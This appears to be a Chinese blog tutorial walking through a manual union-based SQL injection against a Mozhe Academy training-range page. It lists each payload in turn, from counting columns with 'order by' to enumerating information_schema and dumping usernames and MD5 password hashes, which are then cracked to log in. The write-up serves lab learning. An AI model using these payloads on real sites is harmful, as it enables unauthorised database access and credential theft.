墨者:SQL手工注入漏洞测试(MySQL数据库)

看天走路吃雪糕2025-07-28 14:53

一、SQL手工注入漏洞测试(MySQL数据库)

本文以墨者学院靶场为例,演示MySQL数据库的手工SQL注入全过程。靶场以自己的地址为准:http://124.70.64.48:47777/new_list.php?id=1

二、注入原理与流程(如下指令去掉了id之前的内容)

MySQL手工注入主要通过闭合SQL语句、联合查询系统表来获取敏感信息。以下是完整的攻击流程:

1. 判断字段数

sql 复制代码 
id=1 order by 5
  • 作用:确定SELECT查询返回的列数
  • 原理 :通过递增order by后的数字,当页面报错时说明超出实际字段数
  • 示例 :若order by 4正常但order by 5报错,说明有4个字段

2. 确定回显位置

sql 复制代码 
id=-1 union select 1,2,3,4
  • 关键点
    • id=-1使原查询无结果
    • union select强制返回我们的数据
    • 页面显示的数字即为可回显的列位置
  • 输出 :假设页面显示23,则后续注入用这两个位置

3. 获取数据库信息

sql 复制代码 
id=-1 union select 1,group_concat(database()),3,4
  • 函数说明
    • database():当前数据库名称
    • group_concat():多行结果合并为字符串
  • 典型返回mozhe_Discuz_StormGroup

4. 枚举数据表

sql 复制代码 
id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
  • 系统表说明
    • information_schema.tables:存储所有表信息
    • table_schema:过滤指定数据库的表
  • 输出示例StormGroup_member,notice,...

5. 获取字段结构

sql 复制代码 
id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
  • 系统表说明
    • information_schema.columns:存储列定义信息
    • table_name:指定目标表
  • 返回结果id,name,password,status,...

6. 提取账号密码

sql 复制代码 
id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

  • 实战技巧

    • 使用group_concat()合并所有记录
    • ,分隔不同字段(如admin,user1123456,qwerty

  • 数据示例

    复制代码 
    用户名:mozhe,admin,...
密码:5f4dcc3b5aa765d61d8327deb882cf99,098f6bcd4621d373cade4e832627b4f6,...

7. MD5解密后,手动登录,获取Key

MD5工具地址:https://www.cmd5.com/

三、关键指令速查表

指令/函数 作用 MySQL特性说明
order by N 判断字段数 报错法最可靠
union select 联合查询 前后列数必须相同
database() 当前数据库名 等价于schema()
group_concat() 行转字符串 默认逗号分隔
information_schema 元数据库 存储所有表/列定义
table_schema 过滤数据库 值需加引号
table_name 过滤表名 区分大小写
相关推荐
百***81271 天前
【HTML+CSS】使用HTML与后端技术连接数据库
css·数据库·html
6***3491 天前
MySQL项目
数据库·mysql
木井巳1 天前
【MySQL数据库】数据库基础
数据库·mysql
Wang's Blog1 天前
MySQL: 查询全流程深度解析与性能优化实践指南
数据库·mysql·性能优化
一 乐1 天前
宠物管理|宠物共享|基于Java+vue的宠物共享管理系统(源码+数据库+文档)
java·数据库·vue.js·spring boot·springboot·宠物
Wang's Blog1 天前
MongoDB小课堂: 高级查询操作符与游标管理综合指南之深度整合逻辑操作符、字段处理、数组查询与游标控制的最佳实践
数据库·mongodb
垂金烟柳1 天前
MongoDB GridFS 历史数据自动化清理实践
数据库·mongodb·自动化
白露与泡影1 天前
MySQL中的12个良好SQL编写习惯
java·数据库·面试
foundbug9991 天前
配置Spring框架以连接SQL Server数据库
java·数据库·spring
q***31891 天前
mysql 迁移达梦数据库出现的 sql 语法问题 以及迁移方案
数据库·sql·mysql
热门推荐
01GitHub 镜像站点02【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连03BongoCat - 跨平台键盘猫动画工具04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南07Linux下V2Ray安装配置指南08全球最强模型Grok4,国内已可免费使用!(附教程)09Labelme从安装到标注:零基础完整指南10Spring Boot 4.0 发布总结:新特性、依赖变更与升级指南